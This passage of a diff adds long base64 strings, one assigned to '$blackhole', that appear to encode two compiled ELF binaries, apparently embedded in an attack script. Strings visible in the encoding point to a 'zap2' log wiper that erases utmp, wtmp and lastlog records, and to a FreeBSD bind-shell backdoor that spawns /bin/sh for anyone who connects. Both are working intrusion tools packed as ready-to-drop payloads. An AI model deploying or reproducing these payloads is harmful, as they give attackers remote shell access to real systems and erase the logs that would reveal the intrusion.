+AAAAAB0AAAASAAAAKQAAAAAAAACsAAAAEgAAAEkAAAAAAAAA1QAAABIAAAALAAAAAAAAACkAAAAS
+AAAAEgAAAAAAAAA8AAAAEgAAAGIAAAAAAAAAfAAAABIAAAAYAAAAAAAAADAAAAASAAAAMQAAAAAA
+AAD/AAAAEgAAADoAAABgiQQIBAAAABEADgAkAAAAAAAAAHwAAAASAAAAbQAAAAAAAAAAAAAAIAAA
+AABsaWJjLnNvLjYAcHJpbnRmAGxzZWVrAGJ6ZXJvAHdyaXRlAHJlYWQAc3RybmNtcABnZXRwd25h
+bQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBzdHJsZW4Ab3BlbgBjbG9zZQBfX2dt
+b25fc3RhcnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABAAEA
+AAAQAAAAAAAAABBpaQ0AAAIAfAAAAAAAAADImgQIBg0AAJyaBAgHAQAAoJoECAcCAACkmgQIBwMA
+AKiaBAgHBAAArJoECAcFAACwmgQIBwYAALSaBAgHBwAAuJoECAcIAAC8mgQIBwkAAMCaBAgHCgAA
+xJoECAcMAABVieWD7Ajo8QAAAOhMAQAA6G8FAADJwwD/NZSaBAj/JZiaBAgAAAAA/yWcmgQIaAAA
+AADp4P////8loJoECGgIAAAA6dD/////JaSaBAhoEAAAAOnA/////yWomgQIaBgAAADpsP////8l
+rJoECGggAAAA6aD/////JbCaBAhoKAAAAOmQ/////yW0mgQIaDAAAADpgP////8luJoECGg4AAAA
+6XD/////JbyaBAhoQAAAAOlg/////yXAmgQIaEgAAADpUP////8lxJoECGhQAAAA6UD///8x7V6J
+4YPk8FBUUmjYiAQIaJCIBAhRVmgaiAQI6G/////0kJBVieVT6AAAAABbgcPzFQAAUIuDOAAAAIXA
+dAL/0Itd/MnDkJBVieWD7AiAPcyaBAgAdSmhrJkECIsQhdJ0F4n2g8AEo6yZBAj/0qGsmQQIixCF
+0nXrxgXMmgQIAcnDifZVieWD7AihjJoECIXAdBm4AAAAAIXAdBCD7AxojJoECOjnevv3g8QQycOQ
+kFWJ5YHsiAEAAIPsCGoCaGSJBAjo+P7//4PEEKPQmgQIgz3QmgQIAA+IsgAAAIPsBGiAAQAAjYV4
+/v//UP810JoECOj5/v//g8QQhcB/Aut+g+wM/3UI6GX+//+DxBCJwo2FeP7//4PALIPsBFL/dQhQ
+6Fr+//+DxBCFwHWwg+wIaIABAACNhXj+//9Q6I/+//+DxBCD7ARqAWiA/v///zXQmgQI6Ff+//+D
+xBCD7ARogAEAAI2FeP7//1D/NdCaBAjo2v3//4PEEOlf////g+wM/zXQmgQI6NT9//+DxBDJw1WJ
+5YHsmAEAAMeFdP7//wEAAACD7AhqAmhuiQQI6A3+//+DxBCj0JoECIM90JoECAAPiBMBAACDvXT+
+////dQXp9AAAAIPsBGoCi5V0/v//idDR4AHQweAH99hQ/zXQmgQI6Lj9//+DxBCD7ARogAEAAI2F
+eP7//1D/NdCaBAjo2/3//4PEEIXAeQzHhXT+////////66CD7Az/dQjoPf3//4PEEInCjYV4/v//
+g8Asg+wEUv91CFDoMv3//4PEEIXAdWiD7AhogAEAAI2FeP7//1DoZ/3//4PEEIPsBGoCi5V0/v//
+idDR4AHQweAH99hQ/zXQmgQI6CL9//+DxBCD7ARogAEAAI2FeP7//1D/NdCaBAjopfz//4PEEMeF
+dP7////////pC////42FdP7///8A6f7+//+D7Az/NdCaBAjoiPz//4PEEMnDVYnlgexIAQAAg+wM
+/3UI6O/8//+DxBCJRfSDffQAD4SUAAAAg+wIagJofIkECOiw/P//g8QQo9CaBAiDPdCaBAgAD4iD
+AAAAg+wEagCLRfSLUAiJ0MHgAwHQweADAdDB4AJQ/zXQmgQI6GX8//+DxBCD7AhoJAEAAI2FuP7/
+/1Dobvz//4PEEIPsBGgkAQAAjYW4/v//UP810JoECOjR+///g8QQg+wM/zXQmgQI6ND7//+DxBDr
+E4PsCP91CGiNiQQI6Pv7//+DxBDJw1WJ5YPsCIPk8LgAAAAAKcSDfQgCdUuD7AyLRQyDwAT/MOgN
+////g8QQg+wMi0UMg8AE/zDorv3//4PEEIPsDItFDIPABP8w6Lr8//+DxBCD7AxolIkECOia+///
+g8QQ6xCD7Axom4kECOiI+///g8QQycOQkJBVieVXVlOD7AzoAAAAAFuBw/IRAADo7vr//42TFP//
+/42LFP///ynKMfbB+gI51nMPideQ/5SzFP///0Y5/nL0g8QMW15fycNVieVWU+gAAAAAW4HDrhEA
+AI2LFP///42DFP///ynBwfkChcmNcf91C+g6AAAAW17Jw4n2/5SzFP///4nyToXSdfLr5VWJ5VNS
+oXyaBAiD+P+7fJoECHQMg+sE/9CLA4P4/3X0WFvJw1WJ5VPoAAAAAFuBw0cRAABS6GL7//+LXfzJ
+wwADAAAAAQACAC9ldGMvdXRtcAAvdXNyL2FkbS93dG1wAC91c3IvYWRtL2xhc3Rsb2cAJXM6ID8K
+AFphcDIhCgBFcnJvci4KAAAAAAAAAAAAAIiaBAgAAAAAAQAAAAEAAAAMAAAAmIMECA0AAABAiQQI
+BAAAAEiBBAgFAAAAdIIECAYAAACUgQQICgAAAIYAAAALAAAAEAAAABUAAAAAAAAAAwAAAJCaBAgC
+AAAAWAAAABQAAAARAAAAFwAAAECDBAgRAAAAOIMECBIAAAAIAAAAEwAAAAgAAAD+//9vGIMECP//
+/28BAAAA8P//b/qCBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAD/////AAAAAP////8AAAAAAAAAALSZBAgAAAAAAAAAAMaDBAjWgwQI5oMECPaDBAgGhAQI
+FoQECCaEBAg2hAQIRoQECFaEBAhmhAQIAAAAAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA
+R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH
+Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD
+QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRl
+cnAALm5vdGUuQUJJLXRhZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUu
+dmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0AC5pbml0AC50ZXh0AC5maW5pAC5yb2RhdGEALmRh
+dGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmpjcgAuZ290AC5ic3MALmNvbW1l
+bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAA
+FIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAA
+AAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAEwAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsA
+AAACAAAAlIEECJQBAADgAAAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAAHSCBAh0AgAAhgAA
+AAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAAD6ggQI+gIAABwAAAAEAAAAAAAAAAIAAAACAAAA
+VAAAAP7//28CAAAAGIMECBgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAADiDBAg4
+AwAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAABAgwQIQAMAAFgAAAAEAAAACwAAAAQA
+AAAIAAAAdQAAAAEAAAAGAAAAmIMECJgDAAAXAAAAAAAAAAAAAAAEAAAAAAAAAHAAAAABAAAABgAA
+ALCDBAiwAwAAwAAAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAABwhAQIcAQAANAEAAAAAAAA
+AAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAQIkECEAJAAAbAAAAAAAAAAAAAAAEAAAAAAAAAIcAAAAB
+AAAAAgAAAFyJBAhcCQAARwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAMAAACkmQQIpAkAAAwA
+AAAAAAAAAAAAAAQAAAAAAAAAlQAAAAEAAAACAAAAsJkECLAJAAAEAAAAAAAAAAAAAAAEAAAAAAAA
+AJ8AAAAGAAAAAwAAALSZBAi0CQAAyAAAAAUAAAAAAAAABAAAAAgAAACoAAAAAQAAAAMAAAB8mgQI
+fAoAAAgAAAAAAAAAAAAAAAQAAAAAAAAArwAAAAEAAAADAAAAhJoECIQKAAAIAAAAAAAAAAAAAAAE
+AAAAAAAAALYAAAABAAAAAwAAAIyaBAiMCgAABAAAAAAAAAAAAAAABAAAAAAAAAC7AAAAAQAAAAMA
+AACQmgQIkAoAADwAAAAAAAAAAAAAAAQAAAAEAAAAwAAAAAgAAAADAAAAzJoECMwKAAAIAAAAAAAA
+AAAAAAAEAAAAAAAAAMUAAAABAAAAAAAAAAAAAADMCgAAqAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA
+AwAAAAAAAAAAAAAAdAsAAM4AAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAHwQAAAg
+BQAAGgAAACsAAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAACcFQAA9gIAAAAAAAAAAAAAAQAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAABSBBAgAAAAAAwABAAAAAAAogQQIAAAAAAMAAgAAAAAASIEE
+CAAAAAADAAMAAAAAAJSBBAgAAAAAAwAEAAAAAAB0ggQIAAAAAAMABQAAAAAA+oIECAAAAAADAAYA
+AAAAABiDBAgAAAAAAwAHAAAAAAA4gwQIAAAAAAMACAAAAAAAQIMECAAAAAADAAkAAAAAAJiDBAgA
+AAAAAwAKAAAAAACwgwQIAAAAAAMACwAAAAAAcIQECAAAAAADAAwAAAAAAECJBAgAAAAAAwANAAAA
+AABciQQIAAAAAAMADgAAAAAApJkECAAAAAADAA8AAAAAALCZBAgAAAAAAwAQAAAAAAC0mQQIAAAA
+AAMAEQAAAAAAfJoECAAAAAADABIAAAAAAISaBAgAAAAAAwATAAAAAACMmgQIAAAAAAMAFAAAAAAA
+kJoECAAAAAADABUAAAAAAMyaBAgAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwAAAAAAAAAAAAAAAAAD
+ABgAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAMAGgABAAAAlIQECAAAAAACAAwAEQAAAAAA
+AAAAAAAABADx/xwAAAB8mgQIAAAAAAEAEgAqAAAAhJoECAAAAAABABMAOAAAAIyaBAgAAAAAAQAU
+AEUAAACsmQQIAAAAAAEADwBJAAAAzJoECAEAAAABABYAVQAAALiEBAgAAAAAAgAMAGsAAAD0hAQI
+AAAAAAIADAARAAAAAAAAAAAAAAAEAPH/dwAAAICaBAgAAAAAAQASAIQAAACImgQIAAAAAAEAEwCR
+AAAAsJkECAAAAAABABAAnwAAAIyaBAgAAAAAAQAUAKsAAAAciQQIAAAAAAIADADBAAAAAAAAAAAA
+AAAEAPH/yAAAALSZBAgAAAAAEQARANEAAADQmgQIBAAAABEAFgDTAAAAAAAAAHwAAAASAAAA5AAA
+AAAAAABxAAAAEgAAAPUAAABciQQIBAAAABEADgD8AAAApJkECAAAAAAQAvH/DQEAACCFBAjhAAAA
+EgAMABcBAAComQQIAAAAABECDwAkAQAA2IgECEQAAAASAAwANAEAAJiDBAgAAAAAEgAKADoBAABw
+hAQIAAAAABIADABBAQAAAAAAAB0AAAASAAAAUwEAAAAAAACsAAAAEgAAAGYBAACkmQQIAAAAABAC
+8f95AQAAkIgECEgAAAASAAwAiQEAAMyaBAgAAAAAEADx/5UBAAAaiAQIcwAAABIADACaAQAAAAAA
+ANUAAAASAAAAtwEAAKSZBAgAAAAAEALx/8gBAACkmQQIAAAAACAADwDTAQAAAAAAACkAAAASAAAA
+5QEAAECJBAgAAAAAEgANAOsBAAAAAAAAPAAAABIAAAD8AQAApJkECAAAAAAQAvH/EAIAAAAAAAB8
+AAAAEgAAACACAAAAAAAAMAAAABIAAAAxAgAAAAAAAP8AAAASAAAARQIAAMyaBAgAAAAAEADx/0wC
+AACQmgQIAAAAABEAFQBiAgAA1JoECAAAAAAQAPH/ZwIAAKSZBAgAAAAAEALx/3oCAABgiQQIBAAA
+ABEADgCJAgAAAYYECEwBAAASAAwAkwIAAKSZBAgAAAAAEAAPAKACAAAAAAAAAAAAACAAAAC0AgAA
+pJkECAAAAAAQAvH/ygIAAAAAAAB8AAAAEgAAANoCAABNhwQIzQAAABIADADnAgAAAAAAAAAAAAAg
+AAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1Rf
+XwBfX0pDUl9MSVNUX18AcC4wAGNvbXBsZXRlZC4xAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFt
+ZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5E
+X18AX19kb19nbG9iYWxfY3RvcnNfYXV4AHphcDIuYwBfRFlOQU1JQwBmAHdyaXRlQEBHTElCQ18y
+LjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAX19maW5pX2FycmF5X2VuZABraWxsX3V0bXAAX19k
+c29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfaW5pdABfc3RhcnQAc3RybGVuQEBHTElCQ18yLjAA
+c3RybmNtcEBAR0xJQkNfMi4wAF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19i
+c3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9l
+bmQAZGF0YV9zdGFydABwcmludGZAQEdMSUJDXzIuMABfZmluaQBsc2Vla0BAR0xJQkNfMi4wAF9f
+cHJlaW5pdF9hcnJheV9lbmQAb3BlbkBAR0xJQkNfMi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHdu
+YW1AQEdMSUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2Fy
+cmF5X3N0YXJ0AF9JT19zdGRpbl91c2VkAGtpbGxfd3RtcABfX2RhdGFfc3RhcnQAX0p2X1JlZ2lz
+dGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAcmVhZEBAR0xJQkNfMi4wAGtpbGxfbGFz
+dGxvZwBfX2dtb25fc3RhcnRfXwA=";
+
+$blackhole="f0VMRgEBAQkAAAAAAAAAAAIAAwABAAAARIYECDQAAACgDQAAAAAAADQAIAAGACgAGAAVAAYAAAA0
+AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBkAAAAZAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQIAAsAAAALAAAFAAAAABAAAAEAAAAACwAAAJsECACbBAgEAQAAIAEA
+AAYAAAAAEAAAAgAAABALAAAQmwQIEJsECJgAAACYAAAABgAAAAQAAAAEAAAAEAEAABCBBAgQgQQI
+GAAAABgAAAAEAAAABAAAAC91c3IvbGliZXhlYy9sZC1lbGYuc28uMQAAAAAIAAAABAAAAAEAAABG
+cmVlQlNEAESCBwARAAAAHQAAAAAAAAAWAAAAFwAAABwAAAAaAAAAAAAAAA4AAAARAAAAFAAAABsA
+AAAIAAAAEwAAAAEAAAAZAAAADAAAABUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA
+AAUAAAACAAAAAAAAAAAAAAAHAAAAAAAAAAYAAAALAAAAAAAAAAoAAAAAAAAADQAAAAAAAAAQAAAA
+AAAAAA8AAAASAAAAAAAAABgAAAADAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAESFBAgA
+AAAAEgAAABIAAABUhQQILwAAABIAAAAZAAAAEJsECAAAAAARAPH/IgAAAGSFBAh9AAAAEgAAACgA
+AAB0hQQIAAAAABIAAAAtAAAAhIUECAAAAAASAAAANAAAAJSFBAgAAAAAEgAAADoAAACkhQQIMAAA
+ABIAAAA/AAAAKIUECAAAAAASAAcARQAAALSFBAgAAAAAEgAAAEwAAAAcnAQIBAAAABEAEgBUAAAA
+xIUECAAAAAASAAAAWQAAAAAAAAAAAAAAIAAAAOkAAAAgnAQIAAAAABAA8f9xAAAAAJsECAQAAAAR
+AAwAfAAAANSFBAhwAAAAEgAAAIMAAADkhQQIAAAAABIAAACKAAAA9IUECAAAAAASAAAA3AAAAASc
+BAgAAAAAEADx/48AAADwiQQIAAAAABIACgCVAAAABIYECEwBAAASAAAA1QAAAAScBAgAAAAAEADx
+/5wAAAC4mwQIAAAAABEA8f/oAAAAIJwECAAAAAAQAPH/lwAAABSGBAhbAAAAEgAAALIAAAAkhgQI
+AAAAABIAAAC5AAAAAAAAAAAAAAAgAAAAzwAAADSGBAgAAAAAEgAAAABsaWJjLnNvLjQAc3RyY3B5
+AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABiemVybwBzZW5kAF9pbml0AGFjY2Vw
+dABlbnZpcm9uAGJpbmQAX19kZXJlZ2lzdGVyX2ZyYW1lX2luZm8AX19wcm9nbmFtZQBzaWduYWwA
+bGlzdGVuAGZvcmsAX2ZpbmkAYXRleGl0AF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBzdHJsZW4AX19y
+ZWdpc3Rlcl9mcmFtZV9pbmZvAGNsb3NlAF9lZGF0YQBfX2Jzc19zdGFydABfZW5kAAAAAMSbBAgH
+AQAAyJsECAcCAADMmwQIBwQAANCbBAgHBQAA1JsECAcGAADYmwQIBwcAANybBAgHCAAA4JsECAcK
+AADkmwQIBwwAAOibBAgHEAAA7JsECAcRAADwmwQIBxIAAPSbBAgHFQAA+JsECAcZAAD8mwQIBxoA
+AACcBAgHHAAA6AsCAADojgQAAMMA/zW8mwQI/yXAmwQIAAAAAP8lxJsECGgAAAAA6eD/////Jcib
+BAhoCAAAAOnQ/////yXMmwQIaBAAAADpwP////8l0JsECGgYAAAA6bD/////JdSbBAhoIAAAAOmg
+/////yXYmwQIaCgAAADpkP////8l3JsECGgwAAAA6YD/////JeCbBAhoOAAAAOlw/////yXkmwQI
+aEAAAADpYP////8l6JsECGhIAAAA6VD/////JeybBAhoUAAAAOlA/////yXwmwQIaFgAAADpMP//
+//8l9JsECGhgAAAA6SD/////JfibBAhoaAAAAOkQ/////yX8mwQIaHAAAADpAP////8lAJwECGh4
+AAAA6fD+//9VieWD7AxXVlOJ0o11CIte/I18ngSJPRycBAiF234pg30IAHQji0UIowCbBAiAOAB0
+Fon2gDgvdQmNSAGJDQCbBAhAgDgAdey4EJsECIXAdAyDxPRS6Gb///+DxBCDxPRo8IkECOhW////
+6HX+//+D5PCD7BiJXCQAiXQkBIl8JAjomgAAAIlEJADoQf///41l6FteX8nDkFWJ5YPsCIM9CJsE
+CAB1QOsUjXYAgwUEmwQIBKEEmwQIi0D8/9ChBJsECIM4AHXluAAAAACFwHQNg8T0aAybBAjo33j7
+98cFCJsECAEAAADJw412AFWJ5YPsCMnDVYnlg+wIuAAAAACFwHQSg8T4aAScBAhoDJsECOinePv3
+ycOQVYnlg+wIycNVieWD7EjHRfwgigQIx0X4QIoECMdF9ICKBAjGRdkCuNsaAACG4GaJRdrHRdwA
+AAAAg8T4agiNRdiNUAhS6O79//+DxBCDxPhoq4oECItFDIsQUuiI/f//g8QQg8T4agFqFOgJ/v//
+g8QQg8T8agBqAWoC6Kj9//+DxBCJwIlF8IN98AB9HoPE9IPE9GiyigQI6Fr9//+DxBCJwFDoD/7/
+/4PEEIPE/GoQjUXYUItF8FDoqv3//4PEEInAhcB9IYPE9IPE9GjAigQI6CH9//+DxBCJwFDo1v3/
+/4PEEI12AIPE+GoFi0XwUOiS/f//g8QQicCFwH0hg8T0g8T0aMyKBAjo6fz//4PEEInAUOie/f//
+g8QQjXYAx0XoEAAAAJCDxPyNRehQjUXIUItF8FDoHP3//4PEEInAiUXsg33sAH0eg8T0g8T0aNqK
+BAjonvz//4PEEInAUOhT/f//g8QQ6Cv9//+JwIXAD4TVAAAAagCDxPSLRfxQ6EP9//+DxBCJwFCL
+RfxQi0XsUOiw/P//g8QQagCDxPSLRfhQ6B/9//+DxBCJwFCLRfhQi0XsUOiM/P//g8QQagCDxPSL
+RfRQ6Pv8//+DxBCJwFCLRfRQi0XsUOho/P//g8QQg8T4agCLRexQ6Cf8//+DxBCDxPhqAYtF7FDo
+Fvz//4PEEIPE+GoCi0XsUOgF/P//g8QQg8T8agBo54oECGjnigQI6N77//+DxBCDxPSLRexQ6J/8
+//+DxBCDxPRqAOhy/P//g8QQjXYAg8T0i0XsUOiA/P//g8QQ6cj+///Jw4n2VYnlg+wUU7uomwQI
+gz2omwQI/3QPjXYAiwP/0IPD/IM7/3X0W8nDkFWJ5YPsCMnD6Of8///DAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkNvbm5lY3RlZCEKCgAAAAAAAAAAAAAAAAAAAAAA
+AABUaGlzIGZpbmUgdG9vbCBjb2RlZCBieSBCcm9uYyBCdXN0ZXIKAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAUGxlYXNlIGVudGVyIGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAGFwYWNo
+ZQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJvcgoAQWNjZXB0IGVycm9yAC9i
+aW4vc2gAAAAAAAAAAAAAAAAAAAAAAAAAigQItJsECAAAAAAAAAAAAQAAAAEAAAAMAAAAKIUECA0A
+AADwiQQIBAAAACiBBAgFAAAAuIMECAYAAADogQQICgAAAO0AAAALAAAAEAAAABUAAAAAAAAAAwAA
+ALibBAgCAAAAgAAAABQAAAARAAAAFwAAAKiEBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAEJsECAAAAAAAAAAASoUECFqFBAhq
+hQQIeoUECIqFBAiahQQIqoUECLqFBAjKhQQI2oUECOqFBAj6hQQICoYECBqGBAgqhgQIOoYECABH
+Q0M6IChHTlUpIGMgMi45NS40IDIwMDIwMzIwIFtGcmVlQlNEXQAAR0NDOiAoR05VKSBjIDIuOTUu
+NCAyMDAyMDMyMCBbRnJlZUJTRF0AAEdDQzogKEdOVSkgYyAyLjk1LjQgMjAwMjAzMjAgW0ZyZWVC
+U0RdAABHQ0M6IChHTlUpIGMgMi45NS40IDIwMDIwMzIwIFtGcmVlQlNEXQAIAAAAAAAAAAEAAAAw
+MS4wMQAAAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEA
+AAAwMS4wMQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRh
+ZwAuaGFzaAAuZHluc3ltAC5keW5zdHIALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0
+YQAuZGF0YQAuZWhfZnJhbWUALmR5bmFtaWMALmN0b3JzAC5kdG9ycwAuZ290AC5ic3MALmNvbW1l
+bnQALm5vdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEA
+AAACAAAA9IAECPQAAAAZAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAABCBBAgQAQAAGAAA
+AAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAAAogQQIKAEAAMAAAAAEAAAAAAAAAAQAAAAEAAAA
+NwAAAAsAAAACAAAA6IEECOgBAADQAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAALiDBAi4
+AwAA7QAAAAAAAAAAAAAAAQAAAAAAAABHAAAACQAAAAIAAACohAQIqAQAAIAAAAAEAAAACAAAAAQA
+AAAIAAAAUAAAAAEAAAAGAAAAKIUECCgFAAALAAAAAAAAAAAAAAAEAAAAAAAAAEsAAAABAAAABgAA
+ADSFBAg0BQAAEAEAAAAAAAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAABEhgQIRAYAAKwDAAAAAAAA
+AAAAAAQAAAAAAAAAXAAAAAEAAAAGAAAA8IkECPAJAAAGAAAAAAAAAAAAAAAEAAAAAAAAAGIAAAAB
+AAAAAgAAAACKBAgACgAAAAEAAAAAAAAAAAAAIAAAAAAAAABqAAAAAQAAAAMAAAAAmwQIAAsAAAwA
+AAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEAAAADAAAADJsECAwLAAAEAAAAAAAAAAAAAAAEAAAAAAAA
+AHoAAAAGAAAAAwAAABCbBAgQCwAAmAAAAAUAAAAAAAAABAAAAAgAAACDAAAAAQAAAAMAAAComwQI
+qAsAAAgAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAEAAAADAAAAsJsECLALAAAIAAAAAAAAAAAAAAAE
+AAAAAAAAAJEAAAABAAAAAwAAALibBAi4CwAATAAAAAAAAAAAAAAABAAAAAQAAACWAAAACAAAAAMA
+AAAEnAQIBAwAABwAAAAAAAAAAAAAAAQAAAAAAAAAmwAAAAEAAAAAAAAAAAAAAAQMAACgAAAAAAAA
+AAAAAAABAAAAAAAAAKQAAAAHAAAAAAAAAAAAAACkDAAAUAAAAAAAAAAAAAAAAQAAAAAAAAARAAAA
+AwAAAAAAAAAAAAAA9AwAAKoAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAGARAADQ
+BAAAFwAAAC8AAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAAAwFgAA9gEAAAAAAAAAAAAAAQAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPSABAgAAAAAAwABAAAAAAAQgQQIAAAAAAMAAgAAAAAAKIEE
+CAAAAAADAAMAAAAAAOiBBAgAAAAAAwAEAAAAAAC4gwQIAAAAAAMABQAAAAAAqIQECAAAAAADAAYA
+AAAAACiFBAgAAAAAAwAHAAAAAAA0hQQIAAAAAAMACAAAAAAARIYECAAAAAADAAkAAAAAAPCJBAgA
+AAAAAwAKAAAAAAAAigQIAAAAAAMACwAAAAAAAJsECAAAAAADAAwAAAAAAAybBAgAAAAAAwANAAAA
+AAAQmwQIAAAAAAMADgAAAAAAqJsECAAAAAADAA8AAAAAALCbBAgAAAAAAwAQAAAAAAC4mwQIAAAA
+AAMAEQAAAAAABJwECAAAAAADABIAAAAAAAAAAAAAAAAAAwATAAAAAAAAAAAAAAAAAAMAFAAAAAAA
+AAAAAAAAAAADABUAAAAAAAAAAAAAAAAAAwAWAAAAAAAAAAAAAAAAAAMAFwABAAAAAAAAAAAAAAAE
+APH/DAAAANyGBAgAAAAAAAAJABsAAAAEmwQIAAAAAAEADAAfAAAAsJsECAAAAAABABAALQAAAAib
+BAgAAAAAAQAMADkAAADchgQIAAAAAAIACQBPAAAADJsECAAAAAABAA0AYgAAADCHBAgAAAAAAgAJ
+AG0AAAAEnAQIGAAAAAEAEgB3AAAAOIcECAAAAAACAAkAgwAAAFyHBAgAAAAAAgAJAI4AAAAMmwQI
+AAAAAAEADACcAAAAqJsECAAAAAABAA8AAQAAAAAAAAAAAAAABADx/wwAAADAiQQIAAAAAAAACQCq
+AAAAwIkECAAAAAACAAkAwAAAAKybBAgAAAAAAQAPAIMAAADoiQQIAAAAAAIACQCOAAAADJsECAAA
+AAABAAwAzQAAALSbBAgAAAAAAQAQANoAAAAMmwQIAAAAAAEADQDoAAAAAAAAAAAAAAAEAPH/DAAA
+AGSHBAgAAAAAAAAJAP8AAABEhQQIAAAAABIAAAAGAQAAVIUECC8AAAASAAAADQEAABCbBAgAAAAA
+EQDx/xYBAABkhQQIfQAAABIAAAAcAQAAdIUECAAAAAASAAAAIQEAAISFBAgAAAAAEgAAACgBAACU
+hQQIAAAAABIAAAAuAQAApIUECDAAAAASAAAAMwEAACiFBAgAAAAAEgAHADkBAAC0hQQIAAAAABIA
+AABAAQAAHJwECAQAAAARABIASAEAAMSFBAgAAAAAEgAAAE0BAAAAAAAAAAAAACAAAABlAQAAIJwE
+CAAAAAAQAPH/aQEAAACbBAgEAAAAEQAMAHQBAABEhgQIlwAAABIACQB7AQAA1IUECHAAAAASAAAA
+ggEAAOSFBAgAAAAAEgAAAIkBAAD0hQQIAAAAABIAAACOAQAABJwECAAAAAAQAPH/mgEAAGSHBAha
+AgAAEgAJAJ8BAADwiQQIAAAAABIACgClAQAABIYECEwBAAASAAAArAEAAAScBAgAAAAAEADx/7MB
+AAC4mwQIAAAAABEA8f/JAQAAIJwECAAAAAAQAPH/zgEAABSGBAhbAAAAEgAAANMBAAAkhgQIAAAA
+ABIAAADaAQAAAAAAAAAAAAAgAAAA8AEAADSGBAgAAAAAEgAAAABjcnRzdHVmZi5jAGdjYzJfY29t
+cGlsZWQuAHAuMwBfX0RUT1JfTElTVF9fAGNvbXBsZXRlZC40AF9fZG9fZ2xvYmFsX2R0b3JzX2F1
+eABfX0VIX0ZSQU1FX0JFR0lOX18AZmluaV9kdW1teQBvYmplY3QuMTEAZnJhbWVfZHVtbXkAaW5p
+dF9kdW1teQBmb3JjZV90b19kYXRhAF9fQ1RPUl9MSVNUX18AX19kb19nbG9iYWxfY3RvcnNfYXV4
